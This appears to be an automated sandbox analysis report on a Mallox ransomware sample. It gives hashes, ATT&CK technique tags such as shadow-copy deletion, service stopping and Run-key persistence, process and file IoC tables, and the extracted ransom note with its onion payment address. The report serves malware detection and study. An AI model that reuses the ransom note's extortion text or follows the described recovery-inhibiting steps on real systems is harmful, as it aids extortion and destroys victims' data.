befbb0f6ce9243f8dfbf40cec9d2c8dd829f289758b0749d8ad807bc1dd0fdb1

Resubmissions

26-04-2023 01:50

230426-b9bg3aec93 3

06-12-2022 18:46

221206-xepxvsdd29 10

06-12-2022 18:33

221206-w697fafd3y 10

Analysis

max time kernel
307s
max time network
313s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
06-12-2022 18:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a-Yaoofdkgd.exe
Size

12KB
MD5

2302e560d434d30be97e72035c203088
SHA1

8a018ebd03f0ea55b09fcbd602725570c7a2a4d2
SHA256

befbb0f6ce9243f8dfbf40cec9d2c8dd829f289758b0749d8ad807bc1dd0fdb1
SHA512

ab84e7c726c2dc70b535f3b0dbc6bd114bb18aff08d376ee9e166b2828464d3988fe9a9d61dbd1279d42e758305f2d4644ddab79ac31e57f13e3db66824a529e
SSDEEP

192:5r0rom3lP2KEN18VqYH5pqmnd1C7Dg5pbW1wFb/SWA0VLWx8stYcFmVc03KY:M51H5AmnCKw1vWA0VLWxptYcFmVc03K

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\FILE RECOVERY.txt

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 5737536B8991A61DD958B25E 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
4188	takeown.exe
372	takeown.exe
836	takeown.exe
4256	takeown.exe
4972	takeown.exe
1536	takeown.exe
844	takeown.exe
1260	takeown.exe
2376	takeown.exe
3916	takeown.exe
1004	takeown.exe
4636	takeown.exe
4080	takeown.exe
1416	takeown.exe
384	takeown.exe
60	takeown.exe
3600	takeown.exe
2116	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

a-Yaoofdkgd.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Xmblvnwpqgj = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mcpwdirytk\\Xmblvnwpqgj.exe\""	a-Yaoofdkgd.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

a-Yaoofdkgd.exe

description	ioc	process
File opened (read-only)	\??\O:	a-Yaoofdkgd.exe
File opened (read-only)	\??\Q:	a-Yaoofdkgd.exe
File opened (read-only)	\??\R:	a-Yaoofdkgd.exe
File opened (read-only)	\??\V:	a-Yaoofdkgd.exe
File opened (read-only)	\??\L:	a-Yaoofdkgd.exe
File opened (read-only)	\??\N:	a-Yaoofdkgd.exe
File opened (read-only)	\??\P:	a-Yaoofdkgd.exe
File opened (read-only)	\??\Y:	a-Yaoofdkgd.exe
File opened (read-only)	\??\S:	a-Yaoofdkgd.exe
File opened (read-only)	\??\T:	a-Yaoofdkgd.exe
File opened (read-only)	\??\U:	a-Yaoofdkgd.exe
File opened (read-only)	\??\A:	a-Yaoofdkgd.exe
File opened (read-only)	\??\B:	a-Yaoofdkgd.exe
File opened (read-only)	\??\E:	a-Yaoofdkgd.exe
File opened (read-only)	\??\F:	a-Yaoofdkgd.exe
File opened (read-only)	\??\K:	a-Yaoofdkgd.exe
File opened (read-only)	\??\W:	a-Yaoofdkgd.exe
File opened (read-only)	\??\X:	a-Yaoofdkgd.exe
File opened (read-only)	\??\Z:	a-Yaoofdkgd.exe
File opened (read-only)	\??\G:	a-Yaoofdkgd.exe
File opened (read-only)	\??\H:	a-Yaoofdkgd.exe
File opened (read-only)	\??\I:	a-Yaoofdkgd.exe
File opened (read-only)	\??\J:	a-Yaoofdkgd.exe
File opened (read-only)	\??\M:	a-Yaoofdkgd.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

a-Yaoofdkgd.exe

description pid process target process

PID 1840 set thread context of 3864 1840 a-Yaoofdkgd.exe a-Yaoofdkgd.exe

flow	ioc
6	api.ipify.org

description	pid	process	target process
PID 1840 set thread context of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe

Drops file in Program Files directory 64 IoCs

Processes:

a-Yaoofdkgd.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\dblook	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-ms	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-150.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close.svg	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-32_altform-unplated_contrast-high.png	a-Yaoofdkgd.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\SATIN.ELM	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Triangle.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Outlook.scale-100.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\ui-strings.js	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\Updates\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-250.png	a-Yaoofdkgd.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_KMS_Client_AE-ppd.xrm-ms	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\MedTile.scale-200.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\ui-strings.js	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1249_72x72x32.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNotePageWideTile.scale-150.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\kz_60x42.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\VideoLAN\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\SOLVER\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSmallTile.scale-125.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\es-419_get.svg	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\METCONV.TXT	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\wmplayer.exe.mui	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-125_contrast-white.png	a-Yaoofdkgd.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File created	C:\Program Files\WindowsApps\Microsoft.People_2017.222.1920.0_neutral_~_8wekyb3d8bbwe\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\star_half.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardMSDNR_Retail-ppd.xrm-ms	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Images\win_logo_black.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\MedTile.scale-100_contrast-black.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\SmallTile.scale-100.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-200.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\ui-strings.js	a-Yaoofdkgd.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f3\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\eu\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderMedTile.contrast-black_scale-200.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\crown.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.scale-200.png	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailMediumTile.scale-200.png	a-Yaoofdkgd.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\FILE RECOVERY.txt	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win8.mp4	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.INF	a-Yaoofdkgd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\SmallTile.scale-200.png	a-Yaoofdkgd.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2256	sc.exe
5112	sc.exe
2552	sc.exe
696	sc.exe
4448	sc.exe
4448	sc.exe
1264	sc.exe
2028	sc.exe
4728	sc.exe
3240	sc.exe
4704	sc.exe
1008	sc.exe
224	sc.exe
4228	sc.exe
3612	sc.exe
1268	sc.exe
2264	sc.exe
1600	sc.exe
5012	sc.exe
2868	sc.exe
3088	sc.exe
3032	sc.exe
420	sc.exe
4956	sc.exe
1100	sc.exe
4376	sc.exe
2208	sc.exe
2044	sc.exe
1316	sc.exe
4080	sc.exe
2732	sc.exe
5056	sc.exe
4860	sc.exe
4788	sc.exe
4448	sc.exe
1524	sc.exe
2400	sc.exe
4844	sc.exe
4680	sc.exe
220	sc.exe
3408	sc.exe
732	sc.exe
4860	sc.exe
228	sc.exe
280	sc.exe
5068	sc.exe
676	sc.exe
236	sc.exe
2888	sc.exe
976	sc.exe
4912	sc.exe
324	sc.exe
3716	sc.exe
3636	sc.exe
4552	sc.exe
5092	sc.exe
2024	sc.exe
272	sc.exe
1168	sc.exe
4664	sc.exe
444	sc.exe
4972	sc.exe
328	sc.exe
4500	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

4500 net.exe
Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

2220 tasklist.exe
3272 tasklist.exe
5088 tasklist.exe
1756 tasklist.exe
2984 tasklist.exe
3408 tasklist.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

4008 vssadmin.exe
4644 vssadmin.exe

pid	process
4500	net.exe

pid	process
2220	tasklist.exe
3272	tasklist.exe
5088	tasklist.exe
1756	tasklist.exe
2984	tasklist.exe
3408	tasklist.exe

pid	process
4008	vssadmin.exe
4644	vssadmin.exe

Kills process with taskkill 38 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3848	taskkill.exe
3244	taskkill.exe
4820	taskkill.exe
4852	taskkill.exe
4956	taskkill.exe
1160	taskkill.exe
4632	taskkill.exe
4056	taskkill.exe
4032	taskkill.exe
1208	taskkill.exe
3668	taskkill.exe
1116	taskkill.exe
220	taskkill.exe
4968	taskkill.exe
3432	taskkill.exe
2028	taskkill.exe
2996	taskkill.exe
1456	taskkill.exe
4196	taskkill.exe
32	taskkill.exe
3640	taskkill.exe
4812	taskkill.exe
4644	taskkill.exe
3116	taskkill.exe
2308	taskkill.exe
2256	taskkill.exe
3032	taskkill.exe
4268	taskkill.exe
2252	taskkill.exe
4488	taskkill.exe
160	taskkill.exe
1452	taskkill.exe
4956	taskkill.exe
676	taskkill.exe
4652	taskkill.exe
5056	taskkill.exe
796	taskkill.exe
4912	taskkill.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

a-Yaoofdkgd.exe

pid process

3864 a-Yaoofdkgd.exe
3864 a-Yaoofdkgd.exe

pid	process
3864	a-Yaoofdkgd.exe
3864	a-Yaoofdkgd.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

Processes:

a-Yaoofdkgd.exetakeown.exea-Yaoofdkgd.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1840	a-Yaoofdkgd.exe
Token: SeTakeOwnershipPrivilege	4188	takeown.exe
Token: SeTakeOwnershipPrivilege	3864	a-Yaoofdkgd.exe
Token: SeDebugPrivilege	3864	a-Yaoofdkgd.exe
Token: SeBackupPrivilege	2272	vssvc.exe
Token: SeRestorePrivilege	2272	vssvc.exe
Token: SeAuditPrivilege	2272	vssvc.exe
Token: SeTakeOwnershipPrivilege	1416	takeown.exe
Token: SeTakeOwnershipPrivilege	2376	takeown.exe
Token: SeTakeOwnershipPrivilege	3916	takeown.exe
Token: SeTakeOwnershipPrivilege	1004	takeown.exe
Token: SeTakeOwnershipPrivilege	372	takeown.exe
Token: SeTakeOwnershipPrivilege	3600	takeown.exe
Token: SeTakeOwnershipPrivilege	4256	takeown.exe
Token: SeDebugPrivilege	3432	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	4056	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	220	taskkill.exe
Token: SeDebugPrivilege	4812	taskkill.exe
Token: SeDebugPrivilege	3848	taskkill.exe
Token: SeDebugPrivilege	4912	taskkill.exe
Token: SeDebugPrivilege	2996	taskkill.exe
Token: SeDebugPrivilege	796	taskkill.exe
Token: SeDebugPrivilege	3116	taskkill.exe
Token: SeDebugPrivilege	1116	taskkill.exe
Token: SeDebugPrivilege	3244	taskkill.exe
Token: SeDebugPrivilege	2308	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	5056	taskkill.exe
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeDebugPrivilege	4956	taskkill.exe
Token: SeDebugPrivilege	676	taskkill.exe
Token: SeDebugPrivilege	4652	taskkill.exe
Token: SeDebugPrivilege	4820	taskkill.exe
Token: SeDebugPrivilege	3408	tasklist.exe
Token: SeDebugPrivilege	2220	tasklist.exe
Token: SeDebugPrivilege	3272	tasklist.exe
Token: SeDebugPrivilege	5088	tasklist.exe
Token: SeDebugPrivilege	1756	tasklist.exe
Token: SeDebugPrivilege	2984	tasklist.exe
Token: SeBackupPrivilege	3028	vssvc.exe
Token: SeRestorePrivilege	3028	vssvc.exe
Token: SeAuditPrivilege	3028	vssvc.exe
Token: SeDebugPrivilege	4852	taskkill.exe
Token: SeDebugPrivilege	4956	taskkill.exe
Token: SeDebugPrivilege	4196	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	32	taskkill.exe
Token: SeDebugPrivilege	3668	taskkill.exe
Token: SeDebugPrivilege	4632	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a-Yaoofdkgd.execmd.exea-Yaoofdkgd.execmd.exe

description	pid	process	target process
PID 1840 wrote to memory of 3540	1840	a-Yaoofdkgd.exe	cmd.exe
PID 1840 wrote to memory of 3540	1840	a-Yaoofdkgd.exe	cmd.exe
PID 1840 wrote to memory of 3540	1840	a-Yaoofdkgd.exe	cmd.exe
PID 3540 wrote to memory of 5116	3540	cmd.exe	reg.exe
PID 3540 wrote to memory of 5116	3540	cmd.exe	reg.exe
PID 3540 wrote to memory of 5116	3540	cmd.exe	reg.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 1840 wrote to memory of 3864	1840	a-Yaoofdkgd.exe	a-Yaoofdkgd.exe
PID 3540 wrote to memory of 4188	3540	cmd.exe	takeown.exe
PID 3540 wrote to memory of 4188	3540	cmd.exe	takeown.exe
PID 3540 wrote to memory of 4188	3540	cmd.exe	takeown.exe
PID 3540 wrote to memory of 820	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 820	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 820	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 4956	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 4956	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 4956	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 5096	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 5096	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 5096	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 5076	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 5076	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 5076	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 3336	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 3336	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 3336	3540	cmd.exe	cmd.exe
PID 3540 wrote to memory of 3192	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 3192	3540	cmd.exe	cacls.exe
PID 3540 wrote to memory of 3192	3540	cmd.exe	cacls.exe
PID 3864 wrote to memory of 4720	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4720	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4720	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4492	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4492	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4492	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4784	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4784	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4784	3864	a-Yaoofdkgd.exe	cmd.exe
PID 3864 wrote to memory of 4008	3864	a-Yaoofdkgd.exe	vssadmin.exe
PID 3864 wrote to memory of 4008	3864	a-Yaoofdkgd.exe	vssadmin.exe
